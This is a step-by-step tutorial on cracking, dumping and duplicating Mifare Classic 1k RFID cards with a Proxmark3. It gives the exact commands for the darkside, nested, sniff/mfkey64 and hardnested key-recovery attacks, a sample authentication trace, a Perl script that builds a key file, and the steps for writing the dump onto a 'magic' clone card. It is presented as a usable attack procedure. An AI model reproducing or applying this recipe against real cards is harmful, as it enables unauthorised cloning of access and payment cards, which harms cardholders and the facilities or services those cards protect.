Proxmark3 Mifare Classic 1k (Crack/Dump/Duplicate)
The darkside attack (for weak mifare) can be processed with a low cost hardware like the ARC122U, with mfcuk/mfoc over the libnfc.
Nowadays, this attack is not covering a lot of Mifare classic card anymore. The Proxmark is the best choice. For the Proxmark3, the weak PRNG method is easy to find but the sniff/hardnested method for hard PRNG is more tricky.
1. First Of All – Try Generic Keys…
like this somekeys.txt, took from Mifare Classic Tool (android)
pm3> hf mf chk *1 A 1234567890ab somekeys.txt
If you are lucky, you have a key… need to check now against B.
pm3> hf mf chk *1 ? KEY_FOUND
If you don’t have B, jump to the “Crack others keys” of each section 2. If you have B, you have all the keys A/B and you can jump to section 3.
2. Method For Weak
pm3> hf mf mifare
pm3> hf mf chk 0 A KEY_FOUND (Check Found Key On Block 0 A)
Crack others keys
pm3> hf mf nested 1 0 A KEY_FOUND d (Crack others keys)
2. Method For Hard
Sniff
The fun part… you have to fix the card to the proxmark3 (duct tape) connected to a laptop and set the proxmark3 in sniff mode. If you have a y-usb cable, you can also power the proxmark3 with an usb power pack and connect it back to your desktop to get the traces. The best way to sniff all the transaction is to put the proxmark3 between the card and the reader. Push it against the reader, well aligned… and repeat it 3-4 times to get at least one good sniffed transaction.
pm3> hf 14a sniff
--- trigger the reader with the card (proxmark in between)
--- remove and repeat to get many traces...
--- push the proxmark button to stop
--- read the traces
pm3> hf 14a list
Mifare Classic protocol
Trace example
561882: 1 : 26
64: 2 : TAG 04 00
10217: 2 : 93 20
64: 5 : TAG [[ 9c 59 9b 32 ]] 6c UID
12313: 9 : 93 70 9c 59 9b 32 6c 6b 30
64: 3 : TAG 08 b6 dd
923318: 4 : 60 ((3C)) f5 7b AUTH Block 60
112: 4 : TAG [[ 82 a4 16 6c ]] Nonce Tag (NT)
6985: 8 : [[ a1 e4! 58 ce! ]] [[ 6e ea! 41 e0! ]] NR , AR
64: 4 : TAG [[ 5c! ad f4 39! ]] AT
811513: 4 : 8e 0e! 5d! b9 AUTH Block 0 N
112: 4 : TAG 5a! 92 0d! 85! Nonce Tag (NT)
6946: 8 : 98! d7 6b! 77 d6 c6 e8 70 NR , AR
64: 4 : TAG ca 7e! 0b! 63! AT
670868: 4 : [[ 3e! 70 9c! 8a ]]
112: 4 : TAG 36! 41 24! 79
9505: 8 : 1b! 8c 3a! 48! 83 5a 4a! 27
64: 4 : TAG 40! 6a! 99! 4b
905612: 4 : c9 7c 64! 13! !crc
112: 4 : TAG b5! ab! 1d! 2b
6936: 8 : 7e! d2 5c! ca! 4b! 50! 88! c4 !crc
64: 4 : TAG bf dd 01 be!
987853: 4 : 56 98 49 d6! !crc
### last block e709c8a is not mandatory
./tools/mfkey/mfkey64 9c599b32 82a4166c a1e458ce 6eea41e0 5cadf439 e709c8a
Check key against A/B
pm3> hf mf chk *1 ? KEY_FOUND
...
You can possibly bypass next step if the key is the same on A/B.
Crack others keys
replace 60 with the numeric value of the Hexadecimal between double parenthesis in the example – ours is ‘3C’.
pm3> hf mf hardnested 0 A KEY_FOUND 60 B s w
pm3> sc r hard_autopwn -k KEY_FOUND -a
Keys to dumpkeys.bin (perl):
my $v = <<EOF;
|000| a0a0a0a0a0a0 | 1 | b0b0b0b0b0b0 | 1 |
|001| a0a0a0a0a0a0 | 1 | b0b0b0b0b0b0 | 1 |
...
|015| a0a0a0a0a0a0 | 1 | b0b0b0b0b0b0 | 1 |
EOF
my @a;
while ($v =~ /.*?([0-9a-f]{12})/is) { push @a, $1; $v = $'; }
open FH, ">dumpkeys.bin";
binmode FH;
foreach my $odd (0,1) {
for (my $i=$odd;$i<=$#a;$i+=2) {
my $s = $a[$i];
while (length($s)) {
print FH pack('C', oct('0x'.substr($s,0,2)));
$s = substr($s, 2);
}
}
}
close FH;
Run it and you get a proper dumpkeys.bin to run ‘hf mf dump’ which relies on it.
vim hex2dumpkeys.pl
--- put the full keys table in it.
perl hex2dumpkeys.pl
3. From Keys To Write
Verify:
xxd dumpkeys.bin
Dump the card to dumpdata.bin
pm3> hf mf dump 1
Prepare .eml
python pm3_mfd2eml.py dumpdata.bin dumpdata.eml
Load in blank Magic/Chinese card
pm3> hf mf cload dumpdata